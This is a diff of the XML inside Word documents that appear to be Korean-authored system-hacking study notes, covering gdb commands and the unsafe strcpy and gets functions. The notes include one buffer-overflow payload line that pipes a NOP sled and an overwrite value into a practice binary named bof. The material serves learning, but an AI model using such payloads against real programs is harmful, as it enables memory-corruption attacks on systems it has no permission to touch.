+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> value calculate ) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
         <w:t>&lt;</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -649,7 +916,25 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>ython -c “print(‘\x90’ * (size) + ‘\</w:t>
+        <w:t>ython -c “</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>‘\x90’ * (size) + ‘\</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>

--- a/SystemHacking/Reversing.docx
+++ b/SystemHacking/Reversing.docx
@@ -96,6 +96,7 @@
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
           <w:u w:val="single"/>
+          <w:lang w:eastAsia="ko-Kore-KR"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -105,11 +106,54 @@
         <w:wordWrap/>
         <w:autoSpaceDE/>
         <w:autoSpaceDN/>
-        <w:rPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:u w:val="single"/>
           <w:lang w:eastAsia="ko-Kore-KR"/>
         </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a4"/>
+            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="24"/>
+            <w:lang w:eastAsia="ko-Kore-KR"/>
+          </w:rPr>
+          <w:t>https://mintnlatte.tistory.com/581</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:eastAsia="ko-Kore-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+      </w:pPr>
+      <w:hyperlink r:id="rId7" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a4"/>
@@ -124,12 +168,54 @@
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
         </w:pBdr>
         <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>un</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>list</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -146,42 +232,16 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>un</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>list</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>reak [</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -189,15 +249,15 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>reak [</w:t>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>ource file name</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -206,24 +266,6 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>ource file name</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
         <w:t>]</w:t>
       </w:r>
       <w:r>
@@ -234,7 +276,6 @@
         </w:rPr>
         <w:t>:[</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -689,10 +730,14 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> main  disassemble main</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="40"/>
         <w:rPr>
           <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
           <w:b/>
@@ -701,9 +746,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>main  disassemble</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
@@ -713,57 +756,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> main</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:wordWrap/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="40"/>
-        <w:rPr>
-          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">p/d 0x12345 – 0x12323 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>( Hex</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> value calculate ) </w:t>
+        <w:t xml:space="preserve">p/d 0x12345 – 0x12323 ( Hex value calculate ) </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -772,21 +765,56 @@
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
         </w:pBdr>
         <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function&gt;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -803,8 +831,85 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
         <w:t>&lt;</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>gets function&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>ython -c “print(‘\x90’ * (size) + ‘\</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -812,7 +917,7 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>strcpy</w:t>
+        <w:t>xbe</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -821,8 +926,98 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> function&gt;</w:t>
-      </w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>xba</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>xfa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>xca</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>’)” ; cat ) | ./</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>bof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -839,227 +1034,7 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                                   </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>gets function&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>ython -c “</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>print(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>‘\x90’ * (size) + ‘\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>xbe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>xba</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>xfa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>xca</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>’)” ; cat ) | ./</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>bof</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>&lt;</w:t>
       </w:r>
       <w:r>
@@ -1785,7 +1760,6 @@
     <w:name w:val="Hyperlink"/>
     <w:basedOn w:val="a0"/>
     <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="00972F2E"/>
     <w:rPr>
@@ -1811,6 +1785,18 @@
       <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
       <w:kern w:val="0"/>
       <w:sz w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="a6">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B666EA"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
 </w:styles>
